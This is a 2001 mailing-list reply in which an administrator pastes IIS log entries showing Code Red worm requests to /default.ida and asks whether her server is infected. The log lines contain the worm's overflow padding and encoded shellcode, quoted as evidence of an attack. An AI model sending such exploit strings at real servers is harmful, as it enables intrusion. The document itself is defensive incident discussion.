Jim Thanks for the sniffr. I ran it on my system and it came up with nothing found. I had patched my servers last week, but had not yet patched for V3. This morning I found this in the logs: 2001-08-08 11:35:12 217.32.129.249 - 217.32.157.92 80 GET /default.ida XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u90 90%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u 9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 200 - 2001-08-08 11:35:39 217.32.129.91 - 217.32.157.92 80 GET /default.ida XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u90 90%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u 9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 200 - which would lead me to believe that the Server MUST be infected. I cannot find any trace of the files that are supposed to be on my system, neither can the sniffer programme. What caused the entry? Do I really need to rebuild? I am fully patched now, but am not sure what to do next. TIA Saira -----Original Message----- From: Jim Harrison [mailto:jim@xxxxxxxxxxxx] Sent: 08 August 2001 07:45 To: [ISAserver.org Discussion List] Cc: CommuniGate Pro Discussions Subject: [isalist] Code Red Sniffer Importance: High http://www.ISAserver.org This is a multi-part message in MIME format.